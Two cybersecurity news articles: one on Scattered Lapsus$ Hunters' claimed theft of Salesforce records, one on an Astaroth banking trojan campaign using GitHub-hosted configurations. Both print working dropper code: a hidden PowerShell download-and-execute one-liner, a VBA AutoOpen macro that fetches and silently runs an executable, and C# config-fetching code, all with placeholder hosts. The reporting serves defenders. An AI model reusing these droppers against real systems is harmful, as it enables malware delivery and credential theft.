Scattered Lapsus$ Hunters, a threat group previously associated with high-profile data thefts, recently claimed responsibility for exfiltrating over one billion records from Salesforce environments worldwide.

Emerging in mid-2025, the group has honed its tactics to exploit misconfigurations in cloud identities and exposed APIs.

Initial reports surfaced when multiple Salesforce customers observed anomalous queries against their customer relationship management (CRM) instances late at night, suggesting the presence of an automated extraction tool.

As forensic logs accumulated, investigators realized that the volume and scope of data accessed far exceeded previous intrusions.

In this latest campaign, attackers leveraged a combination of targeted phishing lures and credential stuffing to gain initial footholds.

Victims reported receiving authentic-looking emails prompting mandatory security updates, which delivered a malicious Office macro.

Once executed, the macro reached out to a remote command-and-control server to install a lightweight loader.

Palo Alto Networks analysts noted that this loader was written in Go and compiled with stripped symbols, making reverse engineering more challenging.

The loader subsequently validated API tokens and initiated a multi-stage data harvesting routine.

The impact of this breach extends beyond exposed personal data; proprietary sales strategies, pipeline forecasts, and sensitive client negotiations have all come under threat.

Many organizations rely heavily on Salesforce for mission-critical operations, meaning any compromise can lead to operational disruptions and reputational harm.

Early estimates suggest that the group may have extracted data at a sustained rate of over 500 gigabytes per hour, exfiltrating records in batches via encrypted channels to avoid detection.

Infection Mechanism

A closer look at the infection mechanism reveals a strategic emphasis on stealth and persistence.

After the initial macro dropper executes, a PowerShell script stager is launched through a one-liner such as:-

powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"

This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then decrypts credentials stored in the Windows Credential Manager using the CredRead API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the data access requirements.

Once authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch records. Each batch is buffered in memory and encrypted with ChaCha20 before being transmitted over HTTPS to a dedicated exfiltration endpoint.

To ensure persistence, the malware registers a scheduled task named UpdaterSvc that triggers every two hours. This task validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the last successful record ID.

The group’s meticulous approach to API rate-limit evasion and credential harvesting underscores an advanced understanding of cloud-native environments.

By combining sophisticated social engineering, custom tooling, and resilient persistence tactics, Scattered Lapsus$ Hunters have demonstrated a formidable capability to compromise enterprise Salesforce instances at scale.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Scattered Lapsus$ Hunters Claim to Have Stolen More Than 1 Billion Salesforce Records appeared first on Cyber Security News.

A new wave of the Astaroth banking trojan has emerged, leveraging a novel approach to distribute its malicious configuration files.

First detected in late 2025, this latest campaign employs GitHub’s raw content service to host encrypted JSON configurations containing target URLs, browser injection parameters, and command-and-control (C2) endpoints.

By hiding critical settings behind GitHub’s trusted domain, Astaroth evades conventional network-based detections and blends seamlessly with routine developer traffic.

Delivery remains consistent with previous outbreaks, relying on spear-phishing emails that contain malicious Word documents outfitted with obfuscated macros and decoy content to dupe analysts.

Early victims report receiving emails purporting to be from financial institutions or corporate partners, often citing urgent invoice discrepancies.

Opening the attached document triggers a Visual Basic for Applications (VBA) macro that downloads a lightweight .NET loader from a remote site.

Once executed, the loader reaches out to GitHub’s raw content URLs to fetch the next-stage configuration, which is then decrypted in memory before spawning multiple threads for web injection and credential harvesting.

McAfee researchers noted that by using GitHub as a distribution point, the malware bypasses static allow-lists and hides in plain sight of endpoint protection platforms, significantly extending its window of operation.

Targeted primarily at European and North American banking customers, Astaroth’s impact includes unauthorized fund transfers, credential theft across multiple online banking portals, and in certain cases ransomware deployment for lateral movement.

Advanced Configuration Management Through GitHub Infrastructure

Victims remain unaware of the infection for weeks, as the malware employs both process hollowing and parent-child process masquerading to avoid sandbox detection.

Files dropped to disk are minimal, and registry entries masquerade as legitimate Microsoft Office components, complicating forensic analysis for security teams.

Delving into the infection mechanism reveals a sophisticated multi-stage process designed for stealth and reliability.

Upon opening the malicious Word document, the embedded macro executes the following sequence:-

Sub AutoOpen()
    Dim objHTTP As Object
    Dim strURL As String
    Dim strTemp As String

    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    strURL = "https://example.com/loader.exe"
    objHTTP.Open "GET", strURL, False
    objHTTP.Send

    strTemp = Environ("TEMP") & "\ldr.exe"
    If objHTTP.Status = 200 Then
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strTemp, True)
        objFile.Write objHTTP.responseBody
        objFile.Close
        CreateObject("WScript.Shell").Run strTemp, 0, False
    End If
End Sub

Once ldr.exe executes, it invokes the following .NET routine to fetch and decrypt the GitHub-hosted configuration:

var url = "https://raw.githubusercontent.com/user/repo/main/config.dat";
using var wc = new WebClient();
byte[] data = wc.DownloadData(url);
byte[] decrypted = DecryptConfig(data, key);
var configJson = Encoding.UTF8.GetString(decrypted);

This mechanism illustrates Astaroth’s reliance on legitimate infrastructure to obscure malicious intent, complicating the ability of network defenders to discriminate between benign and malicious traffic.

Continuous monitoring of unusual GitHub raw content access from non-developer endpoints is now recommended as a key detection strategy.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Astaroth Banking Malware Leveraging GitHub to Host Malware Configurations appeared first on Cyber Security News.